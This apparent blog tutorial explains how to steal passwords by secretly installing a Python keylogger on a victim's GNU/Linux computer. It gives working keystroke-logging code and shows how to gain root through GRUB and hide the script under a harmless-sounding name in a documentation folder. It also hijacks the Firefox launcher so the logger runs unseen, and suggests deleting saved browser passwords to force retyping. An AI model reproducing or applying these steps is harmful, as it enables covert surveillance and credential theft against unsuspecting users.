A simple way to steal passwords is to install a keylogger on the victim's computer. I am going to show how to do this on GNU/Linux using the Python programming language.
The first thing to do is to obtain superuser permissions. If the computer is managed by us, we already know the password. If not, we can get superuser access from GRUB. With the necessary permissions, we are free to install the keylogger.
First of all, the
pynput library must be installed executing...
sudo pip install pynput
Next, we need to write the keylogger. This is the code we will use:
#!/usr/bin/env python3 from pynput.keyboard import Key, Listener import logging log_dir = "/usr/share/doc/python3/" logging.basicConfig(filename=(log_dir + "log"), \ level=logging.DEBUG, format='%(asctime)s: %(message)s') def on_press(key): logging.info(str(key)) with Listener(on_press=on_press) as listener: listener.join()
The keylog is stored in
log_dir. In this case, I have specified the
GNU/Linux Python 3 documentation folder. The keylogger can also be
stored in the same directory, perhaps with the name
compile_docs.py or something similar to avoid attracting
attention. Ideally, choose a folder that the victim is not going to
enter to prevent them from realising what we are doing.
The last step would be to run the program every time the computer is
turned on or a program is started without the victim
noticing. If, for example, we want to start the keylogger every
time the user opens Firefox, we can modify the Firefox command. We can
firefox.bin and create the following file
python3 /usr/share/doc/python3/compile_docs.py & exec firefox.bin "$@"
To find out which
firefox file is executed when you click on its icon,
/usr/share/applications, enter the file
firefox-esr.desktop) and look for the line starting with
Next, we should give write permissions for users other than root to the directory where we are going to store the typing log:
sudo chmod o+w /usr/share/doc/python3
Finally, we should wait for the victim to use the computer to get their
passwords or any information they type that we want to obtain. The
keylog will be stored in the file
/usr/share/doc/python3/log. But be
careful: the file can take up a lot of space if you don't delete it
from time to time, so it would be best to uninstall the keylogger after
you have obtained the information you need. Another option is to
configure it to send the keylog information by email instead of saving
it to a file, which would not take up much space on the victim's
computer, but that method requires the use of an email2.
If the victim has the passwords saved in the browser and does not need
to re-type them, we can delete the password file so that the victim is
forced to re-enter them. All in all, with ingenuity we can get a lot of
information, especially if we apply this method against less advanced
users, who will not be very suspicious. For more advanced users, it
might be best to compile the
compile_docs.py program with Nuitka, like I show in the following article.